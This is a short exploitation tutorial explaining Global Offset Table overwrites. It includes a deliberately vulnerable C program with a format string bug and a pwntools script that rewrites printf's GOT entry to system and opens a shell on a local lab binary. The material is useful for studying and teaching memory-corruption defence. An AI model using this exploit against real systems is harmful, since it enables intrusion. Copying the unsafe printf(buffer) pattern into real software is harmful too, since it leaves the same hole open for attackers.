GOT Overwrite
The Global Offset Table (GOT) stores the resolved addresses of functions imported from shared libraries such as libc. Overwriting one of these entries lets an attacker hijack the program's control flow and execute arbitrary code.
How does it work?
The attacker overwrites a targeted GOT entry, for example through a buffer overflow or a format string vulnerability, with the address of an arbitrary function such as system. The next time the program calls the original function, it jumps to the attacker-chosen function instead of the intended one.
Code example
    #include <stdio.h>

    void vuln() {
        char buffer[300];
        while (1) {
            fgets(buffer, sizeof(buffer), stdin);
            /* Format string bug: user input is passed as the format argument,
             * so %n-style specifiers can write to arbitrary addresses such as
             * a GOT entry. The safe form would be printf("%s", buffer). */
            printf(buffer);
            puts("");
        }
    }

    int main() {
        vuln();
        return 0;
    }
Using the format string bug, it is possible to overwrite any GOT entry:
    from pwn import *

    # Load the ELF file and set it as the binary in the context
    elf = context.binary = ELF('./chall')

    # Load the libc library and set its base address
    # ASLR is assumed to be disabled, so the base is fixed
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
    libc.address = 0xf7dc2000

    # Start the target binary (taken from context.binary)
    p = process()

    # Create a format string payload that will overwrite the printf
    # GOT entry with the address of the system function.
    # The first argument (5) is the stack argument index at which the
    # input buffer starts; it is specific to this binary.
    payload = fmtstr_payload(5, {elf.got['printf']: libc.sym['system']})

    # Send the payload; printf(buffer) performs the write
    p.sendline(payload)

    # Discard the output produced by the payload
    p.clean()

    # The next printf(buffer) call is now system(buffer), so send a command
    # (pwntools expects bytes, not str)
    p.sendline(b'/bin/sh')

    # Enter interactive mode
    p.interactive()